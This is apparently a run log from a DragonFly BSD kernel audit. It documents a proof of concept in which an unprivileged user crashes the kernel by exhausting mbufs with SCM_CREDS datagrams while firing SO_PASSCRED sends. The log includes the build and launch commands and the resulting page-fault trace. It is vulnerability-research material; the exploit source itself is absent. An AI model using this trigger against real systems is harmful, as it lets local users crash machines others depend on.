DragonFlyBSD Kernel Audit
DF-0011 / run.log
← back to finding ↓ download raw
DF-0011 — decisive run record (nopasscred_panic).
Run as unprivileged user maxx (uid 1001). Guest: DragonFly 6.5-DEVELOPMENT
(v6.5.0.1712.g89e6a-DEVELOPMENT, built Mon Jun 29 14:18:01 UTC 2026).

NOTE: this PoC panics the guest, so the program's own stderr (trigger.out on
the guest filesystem) is lost when the kernel drops to DDB and the snapshot
is reverted. The proof of the panic is the serial-console excerpt in
panic.txt (dfbsd-qemu/boot.log), reproduced here. The run was reproduced
twice from independent fresh `vm.sh reset` boots with an identical signature.

===== build (fresh guest, DF-0011/build.log) =====
$ cd poc/DF-0011 && cc -o nopasscred_panic nopasscred_panic.c -lpthread
BUILD_EXIT=0
-rwxr-xr-x  1 maxx  maxx  10384 Jul  2 00:38 nopasscred_panic

===== launch (unprivileged, detached) =====
$ (./nopasscred_panic > trigger.out 2>&1 &) ; echo launched
launched
(program ramps plain-mbuf pressure via SCM_CREDS-bearing SOCK_DGRAM datagrams
 held open across many socketpairs, while a trigger thread continuously fires
 no-control SO_PASSCRED sends; ~44s after launch the guest becomes
 unresponsive to ssh.)

===== serial console (dfbsd-qemu/boot.log) — the panic =====
login: Warning: objcache(mbuf) exhausted on cpu0!
Warning: objcache(mbuf) exhausted on cpu1!
Fatal user address access from kernel mode from nopasscred_panic at ffffffff806cdac1

Fatal trap 12: page fault while in kernel mode
cpuid = 1; lapic id = 1
fault virtual address	= 0x10
fault code		= supervisor read data, page not present
instruction pointer	= 0x8:0xffffffff806cdac1
stack pointer	        = 0x10:0xfffff800ab5d3568
frame pointer	        = 0x10:0xfffff800ab5d35a8
code segment		= base 0x0, limit 0xfffff, type 0x1b
			= DPL 0, pres 1, long 0, def32 0, gran 1
processor eflags	= interrupt enabled, resume, IOPL = 0
current process		= 1468
current thread          = pri 6
kernel: type 12 trap, code=0

CPU1 stopping CPUs: 0x00000001
 stopped
Stopped at      unp_internalize.isra.12+0x11:   movq    0x10(%rdi),%rbx
db>

===== result =====
status = reproduced (panic). Impact = denial of service. Guest reset
afterwards to recover.